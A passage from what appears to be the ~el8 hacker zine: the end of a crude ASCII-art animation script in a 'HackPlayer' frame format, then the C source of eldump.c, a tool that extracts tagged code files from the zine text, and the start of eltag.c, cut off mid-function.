#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ _
|$$$$$| (\ \)
$$$#$$$$$$$$$$$$$$$i. o__^\/ ,
;$$$'~$$$~~~~~~ $$$$i. ,i \ ' \ >
($$$. ||| `$$i.i$' `| \____\ -
(#$$!. $i `!$$$! | ) *FART*
$`#$$!.#$.#.A$$$,!$W! `V'$.,. .//---_/-_/ -
HACKPLAYEROPT:FRAME_END 344
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 345

*NOOOOOOOOOO!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ _
|$$$$$| (\ \)
$$$#$$$$$$$$$$$$$$$i. O__^\/ ,
;$$$'~$$$~~~~~~ $$$$i. ,i \ ' \ < -
($$$. ||| `$$i.i$' `| \____\ - -
(#$$!. $i `!$$$! | ) *FART*
$`#$$!.#$.#.A$$$,!$W! `V'$.,. .//---_/-_/ - -
HACKPLAYEROPT:FRAME_END 345
HACKPLAYEROPT:USLEEP 400000
HACKPLAYEROPT:FRAME_BEGIN 346

*NOOOOOOOOOOOOOO!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ _
|$$$$$| (\ \) - - -
$$$#$$$$$$$$$$$$$$$i. o__^\/ , - -- - -
;$$$'~~$$$~~~~~ $$$$i. ,i \ P '| < - - - - -
($$$. ||| `$$i.i$' `| \____\ - - - - - -
(#$$!. $i `!$$$! | ) *FART* -
$`#$$!.#$.#.A$$$,!$W! `V'$.,. .//---_/-_/ - - - -
HACKPLAYEROPT:FRAME_END 346
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 347

*NOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ _ - -
|$$$$$| (\ \) - - - -
$$$#$$$$$$$$$$$$$$$i. o__^\/ , - -- - -
;$$$'~$$$~~~~~~ $$$$i. ,i \ ' \ > - - - - - -
($$$. ||| `$$i.i$' `| \____\ - - - - - - -
(#$$!. $i `!$$$! | ) *FART* - - -
$`#$$!.#$.#.A$$$,!$W! `V'$.,. .//---_/-_/ - - - - --
HACKPLAYEROPT:FRAME_END 347
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 348

*NOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ - - - - --
|$$$$$| - - - (\ - - - - - -
$$$#$$$$$$$$$$$$$$$i. - -- (\_\oo__o .
;$$$'$$$~~~~~~~ $$$$i. ,i -- - -`-'\ ` / `( -- - - -
($$$.||| `$$i.i$' - - - | \_____| -- *F4RT*
(#$$!. $i `!$$$! - - - | | - - - -
$`#$$!.#$.#.A$$$,!$W! `V'$.,. -- --./`,----./~| - -
HACKPLAYEROPT:FRAME_END 348
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 349

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ - - - - --
|$$$$$| - - - (\ - - - - - -
$$$#$$$$$$$$$$$$$$$i. - -- (\_\Oo__o .
;$$$'$$$~~~~~~~ $$$$i. ,i -- - -`-'\ ` / `( -- - - -
($$$.||| `$$i.i$' - - - | \_____| -- *F4RT*
(#$$!. $i `!$$$! - - - | | - - - -
$`#$$!.#$.#.A$$$,!$W! `V'$.,. -- --./`,----./~| - -
HACKPLAYEROPT:FRAME_END 349
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 399

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ - - - - -- - -
|$$$$$| - - - - - (\ - - - - - -
$$$#$$$$$$$$$$$$$$$i. - -- - - (\_\Oo__o -- - -
;$$$'$$$~~~~~~~ $$$$i. ,i --- - - `-'\ ` / -- - - -
($$$.`'' `$$i.i$' - - -- | \__| --
(#$$!. $i `!$$$! - - - | : | - - - -
$`#$$!.#$.#.A$$$,!$W! `V'$.,. -- --./`,--./~| - -
HACKPLAYEROPT:FRAME_END 399
HACKPLAYEROPT:USLEEP 400000
HACKPLAYEROPT:FRAME_BEGIN 350

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ *muwahah*
|$$$$$| (\
$$$#$$$$$$$$$$$$$$$i. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i. ,i ___ `-'/ `_/
($$$.||| `$$i.i$' '`--\______/ |
(#$$!. $i `!$$$! / |
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ' -`/.------'\^-'
HACKPLAYEROPT:FRAME_END 350
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 351

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ *bahahaha*
|$$$$$| (\
$$$#$$$$$$$$$$$$$$$i. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i. ,i ___ `-'/ `_/
($$$.||| `$$i.i$' '`--\______/ |
(#$$!. $i `!$$$! O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ' -`/.------'\^-'
HACKPLAYEROPT:FRAME_END 351
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_BEGIN 352

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *POOP OPPOOPOOOPP*
|$$$$$
|$$$$$| (\
$$$#$$$$$$$$$$$$$$$i. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i. ,i ___ `-'/ `_/
($$$.||| `$$i.i$' '`--\______/ |
(#$$!. $i `!$$$! ###O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ' -`/.------'\^-'
HACKPLAYEROPT:FRAME_END 352
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 353

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$# *cough*
`$$$'
$$$
|$$$e. *j00 like that? huh?*
|$$$$$
|$$$$$| (\
$$$#$$$$$$$$$$$$$$$i. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i. ,i ___ `-'/ `_/
($$$.<<< `$$i.i$' '`--\______/ |
(#$$!. $i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 353
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 354

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$' *cough*
$$$
|$$$e.
|$$$$$ *buwahahaha*
|$$$$$| (\
$$$#$$$$$$$$$$$$$$$i. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.<<< `$$i.i$'#######'`--\______/ |
(#$$!. $i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 354
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 355

*PUKE*
v-^
,i$$$i.
$$$$$$$ *cough*
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$
|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.||| `$$i.i$'#######'`--\______/ |
(#$$!. $i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 355
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 356

*PUKE*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.$$###$##$!#$$^%%$##$#!!$..
|$$$$$#########.##$$$%%$$###..##.
|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!. $i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 356
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 357

*PUKE*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$..$$.##.!!$##!.%!!$@$$%%%
$$#|$$$e.$$###$##$!#$$^%%$##$#!!$..
$$#|$$$$$#########.##$$$%%$$###..##.
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 357
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 358

*PUKE*
v-^
,i$$$i.
$$$$$$$
#$$$$$# ../|IQI\.
`$$$'..$^%%$>>$%$##@@!$$###
$$!.$$$..$$.##.!!!!$##.%!!$$$%%%
$$#|$$$e.$$###$##$!#$$^%%$##$#!!$..
$$#|$$$$$#########.##$$$%%$$###..##.
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 358
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 359

*HELLLPM MMOCS M OMSXO MMO *
v-^
,i$$$i.
$$$$$$$ ../|IQI\.
#$$$$$#.,.%%.$$@!!#$$$!!$#.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$##.%!!$$$%%%
$$#|$$$e.$$###$##$!#$$^%%$##$#!!$..
$$#|$$$$$#########.##$$$%%$$###..##.
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 359
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 360

*MUAUHH LKPEL HELP L PL P LEHELP L PELP* <choke>
v-^
,i$$$i.
$$$$$$$.$$#!##: ../|IQI\.
.#$$$$$#.,.%%.$$.!!#$$$!!$#.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$##.%!!$$$%%%
$$#|$$$e.$$###$##$!#$$^%%$##$#!!$..
$$#|$$$$$#########.##$$$%%$$###..##.
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 360
HACKPLAYEROPT:TIMEOUT_USLEEP 400000
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_BEGIN 361

*ndcaskjf;aslfas....
v-^
,i$$$i.##$$!..
$$$$$$$.$$#!##: ../|IQQQI\.
.#$$$$$#.,.%%.$$?!!#$$$!!$##.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$*!!$$@$%%%|.
$$#|$$$e.$$##^$##$!#$$%%%$##$#!!$.
$$#|$$$$$####$$####.##$$$%%$$###.##
$$!|$$$$$|######$$$####@####...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 361
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_BEGIN 362

*ndcaskjf;aslfas....
v-^
,i$$$i.##$$!..
$$$$$$$.$$#!##: ../|IQQQI\.
.#$$$$$#.,.%%.$$?!!#$$$!!$##.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$*!!$$@$%%%|.
$$#|$$$e.$$##^$##$!#$$%%%$##$#!!$.
$$#|$$$$$####$$####.##$$$%%$$###.##
$$!|$$$$$|######$$$#########...##..$ (\ _o
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O/ *BWAHAHA*
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ ___
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 362
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_BEGIN 363

*ndcaskjf;aslfas....
v-^
,i$$$i.##$$!..
$$$$$$$.$$#!##: ../|IQQQI\.
.#$$$$$#.,.%%.$$?!!#$$$!!$##.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$*!!$$@$%%%|.
$$#|$$$e.$$##^$##$!#$$%%%$##$#!!$.
$$#|$$$$$####$$####.##$$$%%$$###.##
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o *BWAHAHA*
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'| `__/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 363
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 362 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 363 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 362 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 363 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 362 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 363 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 362 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 363 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 361 0
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_BEGIN 364

*ndcaskjf;aslfas....
v-^
,i$$$i.##$$!..
$$$$$$$.$$#!##: ../|IQQQI\.
.#$$$$$#.,.%%.$$?!!#$$$!!$##.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$*!!$$@$%%%|.
$$#|$$$e.$$##^$##$!#$$%%%$##$#!!$.
$$#|$$$$$####$$####.##$$$%%$$###.##
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_O__o
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 364
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_BEGIN 365

*ndcaskjf;aslfas....
v-^
,i$$$i.##$$!..
$$$$$$$.$$#!##: ../|IQQQI\.
.#$$$$$#.,.%%.$$?!!#$$$!!$##.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$*!!$$@$%%%|.
$$#|$$$e.$$##^$##$!#$$%%%$##$#!!$.
$$#|$$$$$####$$####.##$$$%%$$###.##
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_o__.
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 365
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 366

*ndcaskjf;aslfas....
v-^
,i$$$i.##$$!..
$$$$$$$.$$#!##: ../|IQQQI\.
.#$$$$$#.,.%%.$$?!!#$$$!!$##.
.%!`$$$'..$^%%$>>$%$##@@!$$###.
$$!.$$$..$$.##.!!!!$*!!$$@$%%%|.
$$#|$$$e.$$##^$##$!#$$%%%$##$#!!$.
$$#|$$$$$####$$####.##$$$%%$$###.##
$$!|$$$$$|######$$$#########...##..$ (\
$$$#$$$$$$$$$$$$$$$i.#############$. (\_\_.__.
;$$$'$$$~~~~~~~ $$$$i.###,i####### ___ `-'/ `_/
($$$.|||##$$$##@#$##`$$i.i$'###$###'`--\______/ |
(#$$!.$$#!@!#$!!@$$i `!$$$! ###########O |
$`#$$!.#$.#.A$$$,!$W! `V'$.,.####$.-`/.------'\^-'
HACKPLAYEROPT:FRAME_END 366
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_INDENT 365 0
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_INDENT 364 0
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_INDENT 365 0
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_INDENT 366 0
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_INDENT 365 0
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_INDENT 364 0
HACKPLAYEROPT:SLEEP 15
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 500



####### # # ####### ####### # # ######
# # # # # ## # # #
# # # # # # # # # #
# ####### ##### ##### # # # # #
# # # # # # # # # #
# # # # # # ## # #
# # # ####### ####### # # ######



HACKPLAYEROPT:FRAME_END 500
HACKPLAYEROPT:SLEEP 5
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 501
REPLAYING THE FILM..IN 1..2..3
HACKPLAYEROPT:FRAME_END 501
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:RESTART 10
#HACKPLAYEROPT:WRITE THE END
HACKPLAYEROPT:END
[END_CUT] TRON_ROLLING.hp
[END_DIR] 21_HackPlayer




.~v~----------------------------------------------------------~v~.
; *22* ~v~ ELDUMP & ELTAG ~el8 ez1ne t00lz -- s1rsyko ;
`----------------------------------------------------------------'

[BEGIN_DIR] .
[CUT_HERE] eldump.c
/*
-+-+
cat <<'/*++--++*'> eldump.c # */

/**********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on dev/urandom : denied *
**********************************************/



/*******************************************
* eldump.c for standard UNIX compilers *
* next version: *
* *
* +article extraction (ablility to *(E)*
* specify article number) *[~]*
* +code extract by article number *[E]*
* +GUI interface for file viewing *[L]*
* (most likely curses based) *[8]*
* +ability to update code/articles via *[`]*
* updates/correction posted *[9]*
* on ~el8 website *[9]*
* +much cooler/faster/stronger/portable *
* +Versions for DOS C/COBOL/Asm/Pascal *
*******************************************/


// Questions/Comments/Corrections @ el8@press.co.jp
// el8.n3.net
// -packetstorm.securify.com/mag/~el8/
// +packetstormsecurity.com/mag/~el8


#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/**************************************
* next version of eldump will have *
* a lot more features, this is just *
* a basic code extraction version. *
* - team ~el8 *
* *
* #define ISH_START "[SOI] %s" *
* #define ARTICLE_START "[BOW] %s" *
* #define ARTICLE_END "[EOW]" *
* #define ISH_END "[EOI]" *
**************************************/


/* for verbosity */
#define VERBOSE 0x01
#define VERY 0x10
#define LOTS 0x20
/* char array sizes */
#define LINELEN 80
#define BUFLEN 255

/* Issue Tag Defines */
#define CODE_START "[CUT_HERE] %s"
#define CODE_START_ARGS 1
#define DIR_START "[BEGIN_DIR] %s"
#define DIR_START_ARGS 1
#define DIR_END "[END_DIR] %s"
#define DIR_END_ARGS 1
#define CODE_END "[END_CUT] %s"
#define CODE_END_ARGS 1
#define loop(n) for(;n;)

/* global vars */
FILE *TextFD;
char BaseDirectory[BUFLEN], buf[LINELEN], CodeDir[BUFLEN + BUFLEN],
tmp[LINELEN];
int verbose = 0, linez = 0, codez = 0, dirz = 0;
const char *license = \
"/***********************************************\n"
" * released under (E) licensing ... *\n"
" * (E) RULES AND REGULATIONS *\n"
" * permission to use/rewrite/add : granted *\n"
" * permission to trojan/steal : denied *\n"
" * permission to use illegally : denied *\n"
" * permission to use on /dev/urandom : denied *\n"
" ***********************************************/\n"
"/* contact el8@press.co.jp for full license */\n"
"/* code copyrighted by ~el8 -- don't infringe! */\n\n";

/**********************
* int article(char *);
* int issue(char *);
**********************/


/* function prototypes */
int code (char *);
int extr (char *);

int
main (int argc, char *argv[])
{
int NumberOfFiles; // For multiple files
getcwd (BaseDirectory, BUFLEN); // error checking is for pussiez

setvbuf (stderr, (char *) NULL, _IONBF, 0);
if (argc < 2) // no options specified
{
fprintf (stderr,
"\033[0;36m"
".---------------------------------------.\n"
"|\033[1;36m /\\/| _ ___ _ \033[0;36m |\n"
"|\033[1;36m |/\\/ ___| |( _ ) _____ _| |_ _ __ \033[0;36m|\n"
"|\033[1;36m / _ \\ |/ _ \\ / _ \\ \\/ / __| '__| \033[0;36m|\n"
"|\033[1;36m | __/ | (_) || __/> <| |_| | \033[0;36m|\n"
"|\033[1;36m \\___|_|\\___/ \\___/_/\\_\\\\__|_| \033[0;36m|\n"
"`---usage-------------------------------'\n"
"\033[m\n"
"\033[7m %s [file1 file2 file3 ...] <option>\t\033[m\n"
"\033[0;32m\n"
".---options-----------------------------.\n"
"|+\033[1;32m [-v]: verbose \033[0;32m |\n"
"|+\033[1;32m [-vv]: very verbose\033[0;32m |\n"
"|+\033[1;32m [-vvv]: very very verbose \033[0;32m |\n"
"`---------------------------------------'\n"
"\033[m",
argv[0]);
exit (-1);
}

verbose -= verbose; // zero verbose
if (!strncmp (argv[argc - 1], "-v", 2)) // if the last option was a "-v"
{
verbose = VERBOSE;
argc--;
}
else if (!strncmp (argv[argc - 1], "-vv", 3)) // "-vv"
{
verbose = (VERY + VERBOSE);
argc--;
}
else if (!strncmp (argv[argc - 1], "-vvv", 4)) // "-vvv"
{
verbose = (LOTS + VERBOSE + LOTS);
argc--;
}

if (argc < 2)
{
fprintf (stderr, "need files...\n");
exit (-1);
}

for (NumberOfFiles = 1; NumberOfFiles < argc; NumberOfFiles++)
{
if (verbose >= LOTS)
{
fprintf (stderr, "eldumping code from %s\n", argv[NumberOfFiles]);
if (extr (argv[NumberOfFiles]) == 0)
{
fprintf (stderr, "[#%i] code eldump of %s: success!\n",
NumberOfFiles, argv[NumberOfFiles]);
}
else
{
fprintf (stderr, "[#%i] code eldump of %s: failed.\n",
NumberOfFiles, argv[NumberOfFiles]);
}
}
else
{
extr (argv[NumberOfFiles]);
}
}

if (verbose >= VERBOSE)
{
fprintf (stderr, "\t%i texts\n\t%i dirs\n\t%i codes\n\t\%i lines\n",
NumberOfFiles - 1, dirz, codez, linez);
}
exit (0);
}

int
extr (char *TextFileName)

{
char arg[LINELEN];
if ((TextFD = fopen (TextFileName, "r")) == NULL)
{
fprintf (stderr, "opening text %s: %s\n", TextFileName, strerror (errno))
; return (-1);
}
loop (!feof (TextFD))
{
fgets (buf, LINELEN, TextFD);

if (sscanf (buf, DIR_START, arg) == DIR_START_ARGS)
{
snprintf (CodeDir, sizeof CodeDir, "%s/%s", BaseDirectory, arg);
if (verbose >= VERBOSE)
{
fprintf (stderr, "creating %s/\n", CodeDir);
dirz++;
}


if ((mkdir (CodeDir, 0700) == -1) && (errno != EEXIST))
{
perror (CodeDir);
fclose (TextFD);
return (-1);
}
if (chdir (CodeDir) == -1)
{
fprintf (stderr, "changing to code dir %s: %s\n", CodeDir,
strerror(errno));
fclose (TextFD);
return (-1);
}
else if (verbose >= LOTS)
fprintf (stderr, "changing to %s\n", CodeDir);
}
else if (sscanf (buf, CODE_START, arg) == CODE_START_ARGS)
{
if (verbose >= VERY)
fprintf (stderr, "eldumping %s\n", arg);
if (code (arg) == -1)
{
fclose (TextFD);
return (-1);
}
}

else if (sscanf (buf, DIR_END, tmp) == DIR_END_ARGS)
{
if (verbose >= LOTS)
fprintf (stderr, "changing to ..\n");

chdir ((!strcmp (arg, ".")) ? "." : "..");
}
}
fclose (TextFD);
return (0);
}

int
code (char *CodeFileName)
{
FILE *CodeFile;
char codebuff[BUFLEN];

chdir ((CodeDir != NULL) ? CodeDir : ".");

if ((CodeFile = fopen (CodeFileName, "w+")) == NULL)
{
fprintf (stderr, "opening code %s: %s\n", CodeFileName, strerror (errno))
; return (-1);
}
if (verbose >= VERBOSE)
codez++;
if (CodeFileName[strlen(CodeFileName)-1] == 'c' &&
CodeFileName[strlen(CodeFileName)-2] == '.')
fputs (license, CodeFile);
loop (!feof (TextFD))
{
fgets (codebuff, LINELEN, TextFD);

if (sscanf (codebuff, CODE_END, tmp) == CODE_END_ARGS)
{
if (verbose >= LOTS)
fprintf (stderr, "end of %s\n", CodeFileName);

fclose (CodeFile);
break;
}
else
{
fputs (codebuff, CodeFile);
if (verbose >= VERBOSE)
linez++;

}
}
return 0;
}

// [CUT_HERE] <NAME> then [END_CUT] <NAME> //
// [BEGIN_DIR] <NAME> then [END_DIR] <NAME> //


/*++--++*
cat <<'[EOI]'> /dev/null
*/


[END_CUT] eldump.c
[CUT_HERE] eltag.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#define loop(n) for(;n;)

char *TAG="[(%i) %s]";
//char *TOCTAG="~el8|*iSSue2*[(%u) %s]*iSSue2|~el8";
char *TOCTAG=";;;;;;;;;;;;"

extern char *optarg;
FILE *out;
void t4gz(char *,char*,int);

int
main (int argc, char *argv[])
{
int p;
char *file;
int type;
char *t4g = TAG;
if (argc < 3)
{
fprintf (stderr, "usage: %s <format> <-t> [-f infile] <-o outfile>\n"
"formats:\n"
"\t[-i]: integer output\n"
"\t[-X]: uppercase hexidecimal output\n"
"\t[-O]: octal output\n"
"\t[-x]: lowercase hexadecimal\n"
"[-t] = output table of contents\n",argv[0]);
exit (-1);
}
while ( (p = getopt(argc,argv,"tiXOxf:o:"))!=EOF){
switch(p){
case 't':
t4g = TOCTAG;
break;
case 'i':
type = p;
break;
case 'X':
type = p;
break;
case 'O':
type = p;
break;
case 'x':
type = p;
break;
case 'f':
file = optarg;
break;
case 'o':
if ((out=fopen(optarg,"w+"))==NULL)
{
perror(optarg);
exit (-1);
}
break;
default:
exit(-1);
}
}
if (out==NULL) out=stderr;
t4gz(file,t4g, type);
exit (0);
}

void
t4gz (char *T,char *tag,int io)

{
char articlename[80];
unsigned articleno=0;
int lineno;
FILE *TFD;
char buf[80];

if ((TFD = fopen (T, "r")) == NULL)
{
perror(T);
exit (-1);
}
bzero((char*)&buf,sizeof(buf));
lineno-=lineno;
loop (!feof (TFD))
{
lineno++;
fgets (buf, sizeof(buf), TFD);

